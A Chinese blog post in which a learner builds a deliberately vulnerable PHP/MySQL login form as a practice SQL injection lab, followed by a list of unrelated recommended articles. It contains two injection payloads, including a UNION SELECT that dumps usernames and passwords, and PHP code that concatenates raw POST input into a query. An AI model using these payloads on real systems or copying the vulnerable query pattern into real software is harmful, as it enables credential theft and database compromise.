sql—前端验证

最新推荐文章于 2023-07-04 10:35:31 发布
最新推荐文章于 2023-07-04 10:35:31 发布
阅读量490 收藏 1
点赞数
文章标签: 前端 数据库 php ViewUI
原文链接:http://www.cnblogs.com/M3tar/p/7341450.html
版权
写了一个前端验证,html也忘记了,页面写的很粗略,将就看一下,毕竟是我人生第一个自己写的漏洞

 

 

 

主界面,省略掉测试他是否有漏洞。

 

 

Id处输入: 1’ or 1=1#

 

省略中间步骤,直接爆一下东西:

输入:1’ and 1=2 union select 1,2,group_concat(username,0x3a,password) from user#

 

 

这里贴一下我的代码

 <html>
<head>
    <title>M3tar的第一个注入</title>
    <meta http-equiv="content-type"content="text/html"charset="Unicode">
</head>
<body>
<form action="M-star.php" method="post">
    <h1>Sql注入</h1>

    <table>
      <tr>
         <td>id</td>
         <td><input type="text" name="id"></td>
       </tr>
        <tr>
        <td>用户名</td>
        <td><input type="text" name="username"></td>
      </tr>
      <tr>
        <td>密 码</td>
        <td><input type="password" name="password"></td>
      </tr>
      <tr>
        <td><input type="submit" value="提交"></td>
        <td><input type="reset" value="重置"></td>
      </tr>
    </table>

</form>
</body>
</html>


<?php
if($_POST){
  $con=mysql_connect("localhost","root","root");
  mysql_select_db("csm",$con);

  $id = $_POST['id'];
  $sql="select * from user where id='$id'";
  $query=mysql_query($sql,$con);
  $arr=mysql_fetch_array($query, MYSQL_ASSOC);

  if(!empty($arr)){
     echo '<pre>',print_r($arr,1),'</pre>';
  }else{
      echo "输入有误";
  }
}
?>

 

关于写代码学到的一点点心得

1)php:写这个还是要对php有那么一点点的了解,对于数据库编程的内容也要有一些了解:

数据库的三层结构:客户端 mysql dbms 数据对象

2)可以总结一下mysql扩展库操作mysql数据库的步骤

3)关于phpstudy的理解:

  以前只是下了phpstudy,知道往WWW下扔东西,才知道还可以秒切换版本,很不错的功能,希望以后能多加应用。因为写一==这个个简单的sql注入漏洞的界面,emmm,很难受,写不来数据库,百度了半天,很瓜,原来phpstudy里面就可以新建数据库(phpMyadmin、Mysql-front),赶紧照着百度依葫芦画瓢,第一次接触这个自己后台的数据库,非常的兴奋。还有其他问题,现在还没有怎么遇到,以后再补充。

4)html和css感觉白学了,都记不得了,要抓紧时间补足啊。

5)POST和GET参数分别的优势和劣势 http://www.cnblogs.com/hyddd/archive/2009/03/31/1426026.html 详细的可以看这个资料

转载于:https://www.cnblogs.com/M3tar/p/7341450.html

auto1988
关注
SQL server 身份验证
MaxVen
11-02 760
之前装 sql server 的时候用是 是windows 身份验证 发现链接数据库没有相关的教程 使用SQL server 身份验证 教程 首先用Windows身份登录数据库。 2.打开身份验证: 服务器右键-属性-安全性-选择[sql serve 和windows身份验证模式] 选项 保存确定 2. 修改 登录信息 及密码 服务器下-安全性-登录名-选择sa-右键属性- 1)常规面板 修改密码 2) 状态面板 分别 选择 授予 启用 选项 4.重点 重启服务器 数据库-右键-重新启动
js校验sql合法性_前端测试之视觉校验
weixin_28930859的博客
12-16 1922
前述:Hi~这是本菜鸟第二次写关于前端测试的文章,基于第一次写的关于前端性能的自动化测试之后的又一篇关于前端GUI层面的自动化测试的文章。那先来谈谈为什么做这个吧~背景:相信个大大小小的公司,在新版发布之后,都回去走一遍线上ui的测试,不论新增还是迭代,并且就算校验了,也不能阻止线上可能出现的偶发状况,比方前端在SSR的时候,某个字段内带有特殊字符,走到浏览器渲染层面的时候,就会被当成特殊字符解析...
sql 验证测试
auxv18104338的博客
03-30 120
drop procedure OuterPro go create procedure OuterPro as begin declare @a int, @b int begin tran set @a=1 set @b=2 declare @c int set @c=@a+@b prin...
前端测试时,常用SQL
07-19 140
与后台联调页面,经常会验证数据正确性,这时候就需要会点SQL语句,以下是常用的SQL: 单表查询 select * from table 条件查询 select * from table where fieid='33214047251857409' LIKE 查询 "%" 可用于定义通配符(模式中缺少的部分),这句SQL是模糊查询值的前端带有'33214047251'。...
常有前端验证JS
04-16
`validate.js` 可能是一个专门用于前端验证的库,它提供了丰富的功能,帮助开发者确保用户输入的数据符合预期的格式和规则,从而提高用户体验并保护服务器免受无效或恶意数据的影响。下面将详细介绍这个主题中的相关...
前端验证源代码包括JQuery插件验证
12-24
在现代Web开发中,前端验证扮演着至关重要的角色,它能确保用户输入的数据符合预期,减少服务器端的处理压力,并提供即时的用户反馈。这里我们关注的是“前端验证源代码包括JQuery插件验证”,这涉及到JavaScript...
hrm 管理系统 后端使用springboot 前端使用vue 内含sql脚本,亲测可用
05-13
2. SpringBoot验证用户信息,若正确,则返回登录成功的响应,并生成会话(Session)或Token进行身份验证。 3. 用户在前端界面进行操作,如查询员工信息、添加新员工等,这些请求会被发送到后端API。 4. SpringBoot...
实现sql语句正确验证的控件
04-25
本文将探讨如何实现一个用于验证SQL语句正确性的控件,并提供一个简单的实现例子。 首先,我们要理解SQL注入攻击。这是一种常见的网络安全威胁,攻击者通过在输入框中输入恶意构造的SQL语句,试图绕过系统验证,...
调查问卷实例demo,含sql,前端,后端
07-06
这是一个关于调查问卷系统的实例项目,包含了SQL数据库设计、前端用户界面和后端服务器逻辑的代码。这个项目可以作为学习和理解整个调查问卷流程的一个参考模板。 首先,让我们深入了解一下SQL在调查问卷系统中的...
html前端sql格式化.zip
01-08
借助sql-formatter.js插件与ace实现web页面的sql格式化功能。有需要的开发人员可以下载参考。方便了页面操作sql
mysql 验证sql语法,Mysql---基本SQL语法
weixin_31631571的博客
03-23 397
前言该文章主要描述了基本的SQL语法,主要包括增,删,查,改新建时间:20191225天象独行SQL语句种类主要包括DDL(数据定义语言),DML(数据操作语言),DCL(数据控制语言)。0X01;DDL语句主要包括CREATE,DROP,ALTER。A;CREATE:创建数据库和表等对象。比如:CREATE DATABASE 新建数据库名称;B;SHOW DATABASES 查询所有数据库C;D...
前端传输数字,更新sql校验出错
Andrew_Chenwq的博客
12-07 741
前端传输数字,更新sql校验出错 比较常见的数据库字段的更新操作 在更新数据库的时候我们会发现 <if '字段 != null and 字段 != '''> 字段 = #{字段}, </if> 在一般情况下,我们用的是String类型,自然不会出错,但是前端一个 数字,后面一段字段不等于空字符串就会报错 因为数字无法和string类型进行比较,所以条件永远无法成立,数据永远不能更新,而且也不会报错 建议 在进行上下复制代码的时候一定要小心不是string类
前端简单校验
Java追求者的博客
05-16 291
直接上图 <script> function checkForm() { /*alert("aaa00");*/ var c_sname = document.getElementById("s_name").value; var regExp = /^[\u4e00-\u9fa5]+$/ ; if(!c_sname.match(regExp)){ alert("请输入正确的姓名"); return false; }
正则校验windows和linux路径
weixin_43173924的博客
09-07 1033
let winPath = /^[a-zA-Z]:(((\\(?! )[^/:*?<>\""|\\]+)+\\?)|(\\)?)\s*$/; let lnxPath = /^\/(\w+\/?)+$/i; if(!winPath.test(self.formItem.jarlocation) && !lnxPath.test(self.formItem.jarlocation)){ //校验不通过 }else{ //校验通过 } ...
如何用Java校验SQL语句的合法性?有这5种解决方案
pantouyuchiyu的博客
07-04 3316
要在Java中校验SQL语句的合法性,可以使用JDBC API中提供的Statement接口的execute()方法。这个方法会尝试执行给定的SQL语句,如果SQL语句不合法,则会抛出一个SQLException异常。因此,我们可以利用这个异常来判断SQL语句的合法性。
sql语法检测
beiduofen2011的专栏
05-28 5463
maven配置: <dependency> <groupId>com.github.jsqlparser</groupId> <artifactId>jsqlparser</artifactId> <version>4.2</version> </dependency> 用 jsqlparser可以限定输
使用alibaba Druid 对sql 语句进行校验
热门推荐
z69183787的专栏
10-18 1万+
使用到了 Druid中的 实现了 访问者模式的 各类visitor 对 sql 进行读取与解析 com.alibaba druid 1.0.17 List results = new ArrayList(); MySqlStatementParser parser = new MySqlStatementParser(sqls); List stm
前端js对一段sql代码进行语法验证
最新发布
09-24
前端JavaScript本身不具备直接对SQL代码进行语法验证的功能,因为它的作用域主要是处理客户端的用户交互和网页渲染,而不是数据库操作。SQL语法验证通常需要后端语言,如PHP、Python或Node.js等,它们可以利用相应的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值